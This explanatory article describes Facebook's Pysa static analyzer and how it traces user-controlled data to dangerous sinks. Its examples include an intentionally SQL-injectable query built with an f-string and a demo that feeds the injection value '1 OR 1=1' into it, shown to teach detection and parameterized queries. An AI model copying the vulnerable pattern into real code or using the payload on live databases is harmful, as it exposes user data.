Pysa is an open-source static analysis tool built by Facebook to detect and prevent security and privacy issues in Python code. The name is short for Python Static Analyzer.
Pysa is a security-focused tool built on top of Pyre, Facebook's type checker for Python. It analyzes how data flows through code. Data flow analysis is useful because many security and privacy issues can be modeled as data flowing into a place where it shouldn't go, which lets Pysa detect a wide range of issues.
For example, Facebook uses Pysa to check whether its Python code properly uses certain internal frameworks that are designed to prevent access to, or disclosure of, user data based on technical privacy policies.
Pysa also detects common web application security issues such as SQL injection and cross-site scripting (XSS). Facebook uses it to scale application security efforts for Python, most notably for the codebase that powers Instagram's servers.
Pysa was developed with the lessons learned from Zoncolan, Facebook's static analyzer for Hack, in mind. It uses the same algorithms to perform its analysis and even shares some code with Zoncolan. Like Zoncolan, Pysa tracks flows of data through a program from sources to sinks. The most common kinds of sources are places where user-controlled data enters the application, such as Django's HttpRequest.GET dictionary. Sinks tend to be much more varied, but can include APIs that execute code, such as eval, or that access the file system, such as os.open. Pysa performs iterative rounds of analysis to build summaries that determine which functions return data from a source and which functions have parameters that eventually reach a sink. When a source eventually connects to a sink, Pysa reports an issue. Visualizing this process creates a tree with the issue at the apex and the sources and sinks at the leaves.
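The idea of building summaries over several rounds can be sketched with a toy fixed-point loop. This is only an illustration under simplifying assumptions, not Pysa's actual algorithm or data model: the PROGRAM table, the "SINK" marker, and compute_sink_summaries are hypothetical names, and every call is assumed to pass parameters through unchanged.

```python
from typing import Dict, List, Set, Tuple

# Hypothetical toy program. Each function lists its parameters and the calls
# it makes as (callee, argument_names). "SINK" stands in for a dangerous API.
Function = Dict[str, list]
PROGRAM: Dict[str, Function] = {
    "load_profile": {"params": ["user_id"], "calls": [("load_pictures", ["user_id"])]},
    "load_pictures": {"params": ["user_id"], "calls": [("run_query", ["user_id"])]},
    "run_query": {"params": ["query"], "calls": [("SINK", ["query"])]},
    "log_visit": {"params": ["user_id"], "calls": []},
}


def compute_sink_summaries(program: Dict[str, Function]) -> Dict[str, Set[str]]:
    """For each function, collect the parameters that can reach a sink."""
    summaries: Dict[str, Set[str]] = {name: set() for name in program}
    changed = True
    while changed:  # repeat rounds until no summary grows any further
        changed = False
        for name, body in program.items():
            calls: List[Tuple[str, List[str]]] = body["calls"]
            for callee, args in calls:
                for position, arg in enumerate(args):
                    if arg not in body["params"]:
                        continue  # only parameters are tracked in this sketch
                    if callee == "SINK":
                        reaches = True
                    else:
                        # Reuse the callee's summary instead of re-analyzing it.
                        callee_param = program[callee]["params"][position]
                        reaches = callee_param in summaries[callee]
                    if reaches and arg not in summaries[name]:
                        summaries[name].add(arg)
                        changed = True
    return summaries


summaries = compute_sink_summaries(PROGRAM)
for name, params in summaries.items():
    print(name, sorted(params))
```

Because callers are listed before callees here, the loop needs several rounds before the summary for load_profile picks up user_id, which mirrors why summary-based analyses iterate until nothing changes.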
According to Facebook's engineers, Pysa produces some false positives and some false negatives, and users have to decide how to deal with them.
Pysa offers two kinds of functionality that users can apply to remove false positives: sanitizers and features.
Where is Pysa most useful?
Imagine that an engineer has written the following code.
# views/user.py
async def get_profile(request: HttpRequest) -> HttpResponse:
    profile = await load_profile(request.GET['user_id'])
    ...

# controller/user.py
async def load_profile(user_id: str):
    user = await load_user(user_id)  # Loads a user safely; no SQL injection
    pictures = await load_pictures(user.id)
    ...

# model/media.py
async def load_pictures(user_id: str):
    # The value is formatted straight into the SQL text
    query = f"""
        SELECT *
        FROM pictures
        WHERE user_id = {user_id}
    """
    result = await run_query(query)
    ...

# model/shared.py
async def run_query(query: str):
    connection = create_sql_connection()
    result = await connection.execute(query)
    ...
The potential SQL injection in load_pictures is not exploitable, because that function only ever receives the valid user_id that results from calling load_user in the load_profile function.
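Then imagine that an engineer realizes that fetching the user and picture data concurrently would return results faster, and changes load_profile along these lines:
# controller/user.py
async def load_profile(user_id: str):
    user, pictures = await asyncio.gather(
        load_user(user_id),
        load_pictures(user_id),  # no longer user.id
    )
    ...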
This change may look innocuous but ends up connecting the user-controlled user_id string directly to the SQL injection issue in load_pictures. In a large application with many layers between the entry point and database queries, this engineer might never realize that the data is fully user-controlled, or that a SQL injection issue lurks in one of the functions called.
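To make the risk concrete, here is a minimal sketch of what a user-controlled user_id can do once it reaches a query built by string formatting. It assumes an in-memory SQLite database through Python's standard sqlite3 module and uses synchronous code for brevity; the original example does not say which database is used, and make_db, load_pictures_unsafe, and load_pictures_parameterized are hypothetical names.

```python
import sqlite3
from typing import List


def make_db() -> sqlite3.Connection:
    """Create a throwaway in-memory database with two users' pictures."""
    connection = sqlite3.connect(":memory:")
    connection.execute("CREATE TABLE pictures (user_id INTEGER, url TEXT)")
    connection.executemany(
        "INSERT INTO pictures VALUES (?, ?)",
        [(1, "alice.png"), (2, "bob.png")],
    )
    return connection


def load_pictures_unsafe(connection: sqlite3.Connection, user_id: str) -> List[str]:
    # Same pattern as load_pictures: the value becomes part of the SQL text.
    query = f"SELECT url FROM pictures WHERE user_id = {user_id}"
    return [row[0] for row in connection.execute(query)]


def load_pictures_parameterized(connection: sqlite3.Connection, user_id: str) -> List[str]:
    # The value is bound as a parameter, so it is never parsed as SQL.
    query = "SELECT url FROM pictures WHERE user_id = ?"
    return [row[0] for row in connection.execute(query, (user_id,))]


connection = make_db()
malicious_id = "1 OR 1=1"  # attacker-supplied value, e.g. from a query string

leaked = load_pictures_unsafe(connection, malicious_id)
safe = load_pictures_parameterized(connection, malicious_id)
print("string-formatted query returned:", sorted(leaked))
print("parameterized query returned:", safe)
```

The string-formatted version returns every user's pictures for the crafted input, while the parameterized version treats the same input as a plain value. A data flow analysis flags the first pattern only when a user-controlled source can actually reach it, which is what the concurrency change introduces.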
Open-source Pysa:
Facebook has made Pysa open source so that others can use it to find security issues in their own Python code. Because Facebook itself uses open-source Python server frameworks such as Django and Tornado, Pysa can start finding security issues in projects that use these frameworks from the first run.
Limitations:
There is no way to build a perfect static analyzer. Pysa also has limitations, which stem from its choice to detect security issues through data flow, together with design decisions that trade off performance for precision and accuracy.
Previously published behind a paywall: https://centocode.com/pysa-to-detect-and-prevent-security-issues-in-python-code-1437/